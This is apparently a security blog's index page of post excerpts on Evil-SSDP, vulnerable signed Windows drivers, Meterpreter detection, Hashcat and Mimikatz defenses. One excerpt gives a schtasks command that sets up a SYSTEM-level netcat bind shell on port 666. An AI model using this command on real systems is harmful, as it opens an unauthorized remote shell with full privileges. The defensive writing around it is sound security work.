BLOG
Defend against Evil-SSDP
Evil-SSDP can be found at https://github.com/initstring/evil-ssdp Disable your firewall to block SSDP netsh advfirewall firewall set rule group="Network Discovery" new enable=No
Small list of Windows signed drivers which have vulnerability issues
Intel Network Adapter Diagnostic Driver of version 1.03.0.7;RTCore64 driver from MSI Afterburner of version 4.6.2 build 15658 and below;Gdrv driver from various Gigabyte TOOLS of undefined version;ATSZIO64 driver from ASUSTeK WinFlash utility of various...
Windows from privilege level to SYSTEM
A classic way to achieve this is via Scheduled Task Copy netcat to c:\temp (for example) schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR "c:\temp\nc.exe -e cmd -l -p 666" /ST 10:00:00 and then run it with Schtasks /run /TN SysMe to delete afterwards...
Meterpreter and other C2 can we detect them ? (part 3)
This is the 3rd article in this serie. (here is part1 & part2) A little adon to Part 1 & 2, as part of my job is to implement Palo Alto Networks Firewalls, I took the task to work with PaloAltoNetworks for them to create a signature to detect the initial...
Hashcat
https://hashcat.net/hashcat/ and https://github.com/hashcat It's a tool that let's you bruteforce hashes. Hashcat 6.0 is the latest version and support around 208 different hash types ! You can use the CPU or the GPU to compute the hashes. examples of hashtype NTLM,...
Defenses against Mimikatz
as written in this blogpost mimikatz is an amazing tool to read password from a Window machine (either LSASS process, or Registry keys and other means). How can we defend against it ? Run LSASS process as "RunAsPPL"...